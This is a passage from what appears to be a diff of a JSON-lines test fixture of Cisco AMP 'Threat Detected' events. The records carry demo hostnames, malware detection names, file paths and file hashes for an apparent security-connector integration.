Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} \ No newline at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
